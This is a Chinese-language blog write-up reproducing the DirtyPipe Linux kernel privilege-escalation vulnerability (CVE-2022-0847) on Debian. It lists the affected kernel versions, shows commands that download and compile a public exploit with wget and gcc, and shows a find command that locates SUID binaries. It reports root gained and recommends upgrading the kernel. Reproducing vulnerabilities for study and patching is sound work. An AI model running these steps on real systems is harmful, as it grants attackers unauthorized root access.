DirtyPipe CVE-2022-0847 Linux 内核提权漏洞复现
2022-04-07 19:08:40 # 漏洞复现

DirtyPipe CVE-2022-0847 Linux 内核提权漏洞复现

漏洞简介

影响范围:5.8 <= Linux 内核版本 < 5.16.11 / 5.15.25 / 5.10.102

RT 通过 CVE-2022-0847 可覆盖重写任意可读文件中的数据,可将普通权限的用户提升到特权 root

CVE-2022-0847是Linux内核的本地提权漏洞。原理类似于Dirty Cow linux提权。目前该漏洞的EXP已经公开,且处于在野利用。

影响版本

1
Linux kernel>=5.8

漏洞复现

这里用的debian系统,先查看内核版本。

1

刚好在漏洞范围内。

测试exp

1
2
3
4
# 下载exp
wget https://haxx.in/files/dirtypipez.c
# 编译
gcc dirtypipez.c -o dirtypipez

2

这个exp需要一个具有suid权限的文件,然后进行提权。

使用命令查找。

1
find / -perm -u=s -type f 2>/dev/null

3

随便使用一个基本都是可以的。

4

提权成功。

漏洞修复

  • 建议将linux内核升级为安全版本,目前在 Linux 5.10.102、5.15.25 和 5.16.11版本已修复。
上一页
2022-04-07 19:08:40 # 漏洞复现
下一页